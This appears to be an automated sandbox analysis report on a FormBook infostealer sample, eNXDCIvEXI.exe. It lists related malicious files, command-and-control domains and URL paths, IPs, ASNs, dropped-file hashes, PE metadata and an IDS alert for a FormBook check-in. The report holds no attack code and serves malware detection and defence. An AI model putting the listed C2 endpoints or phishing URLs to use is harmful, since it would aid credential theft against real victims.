Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:25:00	API Interceptor	22x Sleep call for process: powershell.exe modified
07:25:16	API Interceptor	1x Sleep call for process: WerFault.exe modified
07:25:48	API Interceptor	12193289x Sleep call for process: chkdsk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.168.172.37	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	www.celebration24.co.uk/mcz6/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.celebration24.co.uk/mcz6/
	PO0424024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.celebration24.co.uk/pq0o/
104.37.39.71	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/mcz6/
	Product Listsd#U0334r#U0334o#U0334w#U0334..exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/pshj/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/mcz6/
	rQuotationRequestandProductAvailabilityForm.exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/pshj/
217.160.0.111	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/mcz6/
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.carliente.com/mcz6/
	JUSTIFICANTE DE PAGO 18903547820000.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	STATEMENT OF ACCOUNT.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/3g97/?iJdtI=UBp4nvRH&-b=pss1I4hPKcXAgTePnemGc7FXasx9qfjLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslIPQEm/bcAIhxallCZA6vttiGmo3Ak8A==
	kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	NHhH776.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.carliente.com/3g97/
	listXofXP.O.doc	Get hash	malicious	FormBook	Browse	www.andrewcrawford.store/q8io/?O4883=HXFtJZVPfNB0&-ZEHgzPx=9NBY9KXzWN9RAeS5ibqsEdeev5FWFMIFtZ8Uab8Ez6YdQ5xfInqB1smFejio0oqmJamksA==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
zhs.zohosites.com	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	RFQ 5654077845567895504_d0c.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	VSL_BUNKER INQUIRY.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	SCAN_0033245554672760018765524126524_pdf.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	justiicante transferencia compra vvda-pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	136.143.186.12
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	z99Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	Solicitud_de_cotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	z17Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	RE Draft BL for BK#440019497 REF#388855.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	Factura (3).exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	4333.exe	Get hash	malicious	DBatLoader, FormBook	Browse	57.151.38.169
	RE Draft BL for BK#440019497 REF#388855.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	57.151.38.169
	kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	NHhH776.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
www.deaybrid.info	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	EST- 250424-0370pdf.exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	Factura (3).exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	Order confirmation F20 - 011 PURCHASE ORDER.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.0.237.22

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	Remittance slip.vbs	Get hash	malicious	FormBook, GuLoader	Browse	212.227.172.253
	lrShdpqqbi.rtf	Get hash	malicious	FormBook	Browse	217.160.230.215
	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	217.160.0.111
	pFvpxWS2lD.exe	Get hash	malicious	FormBook	Browse	217.160.230.215
	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	82.165.178.113
	rShippingDocuments.exe	Get hash	malicious	FormBook	Browse	217.160.230.215
	http://eal2023.es	Get hash	malicious	Unknown	Browse	217.76.156.252
	cbIcBAgY5W.exe	Get hash	malicious	SystemBC	Browse	217.76.146.62
	https://www.4dots-software.com/simple-disable-key/	Get hash	malicious	Unknown	Browse	217.160.0.74
	NZH0ajOmNM.elf	Get hash	malicious	Xmrig	Browse	217.160.70.42
CLOUDFLARENETUS	YEpuPmfrOo.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	YRCDVUynv6.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	xxE73NiLJI.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ltd93En22P.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.91.177
	https://serviceanyirs.com/Bagdad/	Get hash	malicious	Unknown	Browse	172.67.169.117
	https://a.co/d/14AqaMg	Get hash	malicious	Unknown	Browse	172.64.146.152
	sheng05.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	sheng05.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://thxuk.com/account/order-tracking/b2ca79/	Get hash	malicious	Unknown	Browse	172.65.208.22
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	http://workdrive.zohopublic.eu/file/efe6bcb0201f3a92140adacc604376ceb2b52	Get hash	malicious	Unknown	Browse	103.163.152.75
	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	103.168.172.37
	https://googleweblight.com/i?u=https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=&domain=iledefrance.fr	Get hash	malicious	HTMLPhisher	Browse	103.163.246.82
	bot.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.x86_64.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.arm5.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	Z6uUjtIZ0j.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.163.138.166
ONECOMDK	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	104.37.39.71
	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	185.164.14.70
	Utility R.lnk	Get hash	malicious	FormBook	Browse	46.30.213.191
	DASERA LPO PMT-4 FURNITURE 28052024.pdf.exe	Get hash	malicious	FormBook	Browse	77.111.241.124
	DPL SO-CDC63 24-0527MU.xls.vbs	Get hash	malicious	FormBook, GuLoader	Browse	46.30.211.38
	Purchase Order_20240503.exe	Get hash	malicious	FormBook	Browse	46.30.215.104
	3Lf408k9mg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	185.164.14.86
	PO JAN 2024.exe	Get hash	malicious	FormBook	Browse	46.30.213.132
	Purchase Order_20240528.exe	Get hash	malicious	FormBook	Browse	46.30.215.104
	USD46k Swift_PDF.exe	Get hash	malicious	FormBook	Browse	46.30.215.104

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_eNXDCIvEXI.exe_89ed3ed2715539152738a54e623dbca95890f373_ab20fede_bf7f9d28-e8cc-473e-8855-8a256eaaf39f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.234462910054956
Encrypted:	false
SSDEEP:	192:vqtMsTAvKN50UnUlaWBH+Dr4oWdzuiFOZ24lO8tGe:C1TAvKAUnUlamH+/CzuiFOY4lO8tG
MD5:	7D01BAB33D9DACF6C879394386777774
SHA1:	78BB49F772100B4BAAD386F4F15A739663AE4E14
SHA-256:	4939D4E6006EC6A8CD54AC1B4C14977D44ABCB3F7B86DB6E6E3F3D4B0ED63E84
SHA-512:	35E2624D67AA8A01930546E9D296F0F4F5D4CF2DC27789E511C67B9302D8918916BD68CB895A84477FB83A6C3C6B426E193F34393DC37C5C5D4D4E47A3BC550D
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.2.1.4.6.7.0.1.1.7.8.3.3.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.2.1.4.6.7.0.2.6.6.2.7.1.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.7.f.9.d.2.8.-.e.8.c.c.-.4.7.3.e.-.8.8.5.5.-.8.a.2.5.6.e.a.a.f.3.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.c.7.3.0.2.2.-.8.3.1.4.-.4.c.3.f.-.a.1.d.1.-.b.a.8.f.9.8.a.1.4.f.1.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.N.X.D.C.I.v.E.X.I...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.g.e.m.o.y.u.x.e.m.a.j.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.0.-.0.0.0.1.-.0.0.1.4.-.a.9.c.9.-.f.5.2.7.0.4.b.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.3.0.c.4.8.5.9.1.8.2.e.7.3.4.5.9.0.5.5.6.3.2.c.0.8.a.8.4.0.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.d.2.f.a.1.9.7.2.a.5.3.9.a.e.8.4.5.1.8.8.6.b.7.0.3.d.2.4.a.a.5.9.3.8.a.3.2.0.c.f.!.e.N.X.D.C.I.v.E.X.I.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AAF.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jun 6 11:25:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	519306
Entropy (8bit):	3.4629247909311816
Encrypted:	false
SSDEEP:	3072:pYhtei+hXqEv40lfHGLk4GlBmgiGmPcSQU1CCqdmB03+vzABtLzEFtPRU:psQi+kiH1eztqdq03QzyH
MD5:	E32ED68D10BEBFA0F684266AFB373962
SHA1:	BC11EDFA7134E507B99F6D786F9D64188007D841
SHA-256:	394CB932D467BB43341DD5F5FAEAFDECC9590F0A5BE9901DB12321EEF61025CC
SHA-512:	E2F0363D57615DCA2ADC83766EA86AE2E7C64FAC386233BC1273CE26C617F009A2BB5F59976FB88359ABE66C785C4015E710D3FDA31BEC10E1EABA6BE6885197
Malicious:	false
Preview:	MDMP..a..... .........af............D............ ..d.......$...x).......:...).......z..............l.......8...........T...........x=...............d...........f..............................................................................eJ.......f......Lw......................T.............af.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E89.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8608
Entropy (8bit):	3.7101097910427825
Encrypted:	false
SSDEEP:	192:R6l7wVeJaW346Y9RXcrgmf46J7prp89brsDfEZm:R6lXJzI6YbXSgmf4iQrIfX
MD5:	05AD1D9907081038A92217EC78295006
SHA1:	60D8B9CBB2F97510AA1071BA7F407AF4A3BADE4F
SHA-256:	45C057AD9D62F8737DD5278A5F597386CE39F557142038012E6E41C255C73A8F
SHA-512:	C769A1A69B04DDD6038E7A1BA1B069242493951CA829D9B1DAC4E05E59669EBCFB3A79416F11FDAB12091F32D761941A2F83CB7FC8FED8330E7FE50D0A272638
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EE7.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4768
Entropy (8bit):	4.533826098938666
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg771I9gaEhWpW8VYMPYm8M4JZ8mAFFBRplmyq85FTFAV0x0Zd:uIjfaI7HaEw7VMJgrmOAGKZd
MD5:	E354114FAC37C92F836E919E22E45C8E
SHA1:	69CD36A6C7C79FA5DB1541EBBCF5D5E84E48FE3F
SHA-256:	D8F961C4D05114AE62C76F4ACB20808FC26141FBD4DA270D4A76414937EC2CEB
SHA-512:	FD6BDB4F8E7AA84C80D0B3C29E3C6EC1FF042ED05136BA52245F5C1A1B2BD526DE4AA8747926A1BF168F8C40228B7C741F90710F78CA1CEA95B4AECEB8359085
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="355827" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\2E85-1J297

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31hdcogd.5xh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32e4yub0.p44.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4buer0e.pln.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqco1vmh.xdq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466024448721454
Encrypted:	false
SSDEEP:	6144:XIXfpi67eLPU9skLmb0b4GWSPKaJG8nAgejZMMhA2gX4WABl0uNfdwBCswSbtQ:YXD94GWlLZMM6YFH1+tQ
MD5:	96FE731C2D66F13DA152ED58E1FC8A7D
SHA1:	528318E5C22808C69E8A4BF2B30FA9962D34F56A
SHA-256:	30BAB35041DB19B970643075E07785405D71E7F618AECE31A308503836B8663B
SHA-512:	7C27A93668B115BDADDF867B071FD54BE7D675BE7EAE223A1653516271A5358D906085B4AB8149FD18873F395895FAC907F5DA1C9059430CD2608AA310A967DA
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR1.+............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.732485976856334
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	eNXDCIvEXI.exe
File size:	774'153 bytes
MD5:	1f11421fde0376d3fdb2d23041db6ed5
SHA1:	d2fa1972a539ae8451886b703d24aa5938a320cf
SHA256:	650084a6aa83319aa801995935c36f0e2f4be3a537b6936a2f317df83909120f
SHA512:	40156ffc32022cde2f07c2443f8e86f9ec889503d1756cd8fd17d394915798e3905c7433c8426dd8a76a78e58735757242c42a80916d14161680e858a8c35aec
SSDEEP:	12288:xwYYbdh4R67oWT79TZdptzB8oNPTEPGFtissrQJl4/TCZ7A:xwYVg7oWTRKoNYyeRc7A
TLSH:	8AF4118756A81633F625F2359B5395713633ACB849E3B2D927FE3109F0768C94B302A7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...c3............"...0.................. ....@...... ....................................`................................

File Icon


Icon Hash:	153155152a6a1549

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD6D03363 [Wed Mar 15 14:27:47 2084 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x1af22	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd4c0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb4dc	0xb600	76dacacef0baf40683543aa36ae9453e	False	0.5547089629120879	data	6.3265616809449385	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x1af22	0x1b000	0867cefb5200b20d15aa360f60d6d615	False	0.14311161747685186	data	3.8640261107668596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xe24c	0x1e75	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9657560600230858
RT_ICON	0x100c4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m			0.046935999053590444
RT_ICON	0x208ec	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m			0.0915800661313179
RT_ICON	0x24b14	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m			0.1284232365145228
RT_ICON	0x270bc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.19136960600375236
RT_ICON	0x28164	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m			0.3333333333333333
RT_GROUP_ICON	0x285cc	0x5a	data			0.7666666666666667
RT_VERSION	0x28628	0x388	data			0.4911504424778761
RT_VERSION	0x289b0	0x388	data	English	United States	0.4911504424778761
RT_MANIFEST	0x28d38	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/06/24-13:27:33.326679	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49773	80	192.168.2.4	103.168.172.37
